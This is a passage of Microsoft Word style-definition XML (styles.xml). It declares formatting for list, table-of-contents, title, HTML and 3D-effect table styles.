  </w:style>
  <w:style w:type="paragraph" w:styleId="45">
    <w:name w:val="index heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="36"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="46">
    <w:name w:val="List"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:left="360" w:hanging="360"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="47">
    <w:name w:val="List 2"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:left="720" w:hanging="360"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="48">
    <w:name w:val="List 3"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:left="1080" w:hanging="360"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="49">
    <w:name w:val="List 4"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:left="1440" w:hanging="360"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="50">
    <w:name w:val="List 5"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:left="1800" w:hanging="360"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="51">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="40"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="52">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="720"/>
      </w:tabs>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="53">
    <w:name w:val="List Bullet 3"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1080"/>
      </w:tabs>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="54">
    <w:name w:val="List Bullet 4"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1440"/>
      </w:tabs>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="55">
    <w:name w:val="List Bullet 5"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1800"/>
      </w:tabs>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="56">
    <w:name w:val="List Continue"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="360"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="57">
    <w:name w:val="List Continue 2"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="58">
    <w:name w:val="List Continue 3"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="1080"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="59">
    <w:name w:val="List Continue 4"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="1440"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="60">
    <w:name w:val="List Continue 5"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="1800"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="61">
    <w:name w:val="List Number"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="62">
    <w:name w:val="List Number 2"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="432"/>
      </w:tabs>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="63">
    <w:name w:val="List Number 3"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="18"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="64">
    <w:name w:val="List Number 4"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="18"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="65">
    <w:name w:val="List Number 5"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="18"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="66">
    <w:name w:val="macro"/>
    <w:link w:val="290"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="480"/>
        <w:tab w:val="left" w:pos="960"/>
        <w:tab w:val="left" w:pos="1440"/>
        <w:tab w:val="left" w:pos="1920"/>
        <w:tab w:val="left" w:pos="2400"/>
        <w:tab w:val="left" w:pos="2880"/>
        <w:tab w:val="left" w:pos="3360"/>
        <w:tab w:val="left" w:pos="3840"/>
        <w:tab w:val="left" w:pos="4320"/>
      </w:tabs>
      <w:spacing w:before="40" w:after="0" w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsiaTheme="minorHAnsi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:lang w:val="en-US" w:eastAsia="ja-JP" w:bidi="ar-SA"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="65000"/>
            <w14:lumOff w14:val="35000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="67">
    <w:name w:val="Message Header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="291"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="auto" w:sz="6" w:space="1"/>
        <w:left w:val="single" w:color="auto" w:sz="6" w:space="1"/>
        <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="1"/>
        <w:right w:val="single" w:color="auto" w:sz="6" w:space="1"/>
      </w:pBdr>
      <w:shd w:val="pct20" w:color="auto" w:fill="auto"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1080" w:hanging="1080"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="68">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="69">
    <w:name w:val="Normal Indent"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="70">
    <w:name w:val="Note Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="292"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="71">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="293"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="72">
    <w:name w:val="Salutation"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="294"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="73">
    <w:name w:val="Signature"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="295"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="20"/>
    <w:pPr>
      <w:spacing w:before="720" w:after="0" w:line="312" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="74">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="296"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="19"/>
    <w:pPr>
      <w:ind w:left="432" w:right="1080"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w:sz w:val="56"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="75">
    <w:name w:val="table of authorities"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="220" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="76">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="77">
    <w:name w:val="Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="299"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="19"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="16"/>
        <w:left w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="20"/>
        <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="16"/>
        <w:right w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="20"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="7E97AD" w:themeFill="accent1"/>
      <w:spacing w:before="0" w:after="240" w:line="204" w:lineRule="auto"/>
      <w:ind w:left="432" w:right="432"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:kern w:val="28"/>
      <w:sz w:val="72"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="bg1"/>
        </w14:solidFill>
      </w14:textFill>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="78">
    <w:name w:val="toa heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="79">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="underscore" w:pos="9090"/>
      </w:tabs>
      <w:spacing w:after="100"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="808080" w:themeColor="text1" w:themeTint="80"/>
      <w:sz w:val="22"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="50000"/>
            <w14:lumOff w14:val="50000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="80">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="81">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="82">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="660"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="83">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="880"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="84">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="85">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1320"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="86">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1540"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="87">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1760"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="89">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="90">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="20"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="91">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="92">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="969696" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="folHlink"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="93">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="94">
    <w:name w:val="HTML Acronym"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:styleId="95">
    <w:name w:val="HTML Cite"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="96">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="97">
    <w:name w:val="HTML Definition"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="98">
    <w:name w:val="HTML Keyboard"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="99">
    <w:name w:val="HTML Sample"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="100">
    <w:name w:val="HTML Typewriter"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="101">
    <w:name w:val="HTML Variable"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="102">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="646464" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="hlink"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="103">
    <w:name w:val="line number"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:styleId="104">
    <w:name w:val="page number"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:styleId="105">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="88"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="107">
    <w:name w:val="Table 3D effects 1"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="solid" w:color="C0C0C0" w:fill="FFFFFF"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="800080"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="808080" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="FFFFFF" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:right w:val="single" w:color="808080" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="single" w:color="FFFFFF" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="neCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="seCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="swCell">
      <w:rPr>
        <w:color w:val="000080"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:right w:val="nil"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="108">
    <w:name w:val="Table 3D effects 2"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="solid" w:color="C0C0C0" w:fill="FFFFFF"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="single" w:color="808080" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:right w:val="single" w:color="FFFFFF" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
